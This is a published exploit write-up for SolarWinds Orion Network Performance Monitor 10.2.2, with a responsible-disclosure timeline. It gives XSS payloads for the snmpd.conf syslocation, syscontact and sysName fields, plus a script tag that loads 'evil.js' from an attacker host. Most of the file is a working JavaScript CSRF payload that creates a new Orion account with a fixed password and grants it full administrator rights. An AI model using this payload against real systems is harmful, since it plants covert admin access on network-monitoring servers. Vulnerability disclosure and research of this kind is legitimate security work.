/* ###################################################################################### # Exploit Title: SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities # Date: Jul 21 2012 # Author: muts # Version: SolarWinds Orion Network Performance Monitor 10.2.2 # Vendor URL: http://www.solarwinds.com/ ######################################################################################
Timeline:
29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 02 Jul 2012: Contact received from SolarWinds with vulnerability confirmation and plans for remediation 09 Jul 2012: SolarWinds provides a preview release (10.3.1) for testing 10 Jul 2012: Advised SolarWinds that the preview release fixed the reported vulnerabilities 21 Jul 2012: Public disclosure
Vulnerability Details:
SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be:
syslocation <script>alert('location')</script> syscontact <script>alert('contact')</script> sysName <script>alert('name')</script>
In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection.
Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file:
syscontact <script src="http://attacker/evil.js"></script>
*/
function getCookie(c_name) { var i,x,y,ARRcookies=document.cookie.split(";"); for (i=0;i<ARRcookies.length;i++) { x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("=")); y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1); x=x.replace(/^\s+|\s+$/g,""); if (x==c_name) { return unescape(y); } } }
function setCookie(c_name,value,exdays) { var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie=c_name + "=" + c_value; }
function postCredentials(viewState, user, password) { var http = new XMLHttpRequest(); var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion"; var params = "ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1" + "&" + "__EVENTTARGET" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1" + "&" + "__EVENTARGUMENT" + "=" + "&" + "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName" + "=" + user + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password" + "=" + password + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword" + "=" + password + "&" + "__ASYNCPOST" + "=" + "false" http.open("POST", url, false); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.setRequestHeader("Content-lenth", params.length); http.setRequestHeader("Connection", "close"); http.send(params); var response = http.responseText; var doc = document.implementation.createHTMLDocument(''); doc.documentElement.innerHTML = response; return(doc); }
function setAdminPriv(viewState, username) { var http = new XMLHttpRequest(); var url = "/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username + "&AccountType=Edit"; var params = "__EVENTTARGET" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24submitButton" + "&" + "__EVENTARGUMENT" + "=" + "&" + "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24checkboxesVisible" + "=" + "hidden" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAccountEnabled%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24txtAccountExpires" + "=" + "Never" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynDisableSessionTimeout%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAdminRights%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAllowNodeManagement%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynCustomizeViews%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynClearEvents%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynBrowserIntegration%24listBox" + "=" + "true" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxAlertSound" + "=" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tbBreadcrumbItems" + "=" + "50" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl00%241%24menuBars" + "=" + "Default" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl01%243%24menuBars" + "=" + "Network_TabMenu" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl02%242%24menuBars" + "=" + "Virtualization_TabMenu" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxHomePageView" + "=" + "1" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxSummaryView" + "=" + "1" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxReportFolder" + "=" + "%5CReports" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxNodeDetails" + "=" + "-1" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVolumeDetails" + "=" + "3" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxNodeDetails" + "=" + "7" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxInterfaceDetails" + "=" + "14" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVSANDetails" + "=" + "22" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxUCSChassisDetails" + "=" + "24" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "9" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "10" + "&" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "11"
http.open("POST", url, false); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.setRequestHeader("Content-lenth", params.length); http.setRequestHeader("Connection", "close"); http.send(params); var response = http.responseText; var doc = document.implementation.createHTMLDocument(''); doc.documentElement.innerHTML = response; return(doc); }
function getHtmlBody(url, ref) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open('GET', url, false); xmlHttp.send(null); var results = xmlHttp.responseText; var doc = document.implementation.createHTMLDocument(''); doc.documentElement.innerHTML = results; return(doc); }
function getViewState(doc) { return(doc.getElementById("__VIEWSTATE")); }
var username = "myuser"; var password = "test";
// Check if we already attacked the host to avoid duplicated attacks if (getCookie("o1") == null) { // Get the initial view-state var doc1 = getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion"); // Create a new account with the given credentials postCredentials(getViewState(doc1).value, username, password); // Get the edit account view-state var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username + "&AccountType=Edit"); // Assign our new account with administrative privileges setAdminPriv(getViewState(doc2).value, username); // Set the cookie to avoid duplicated attacks setCookie("o1", 1, ""); }
|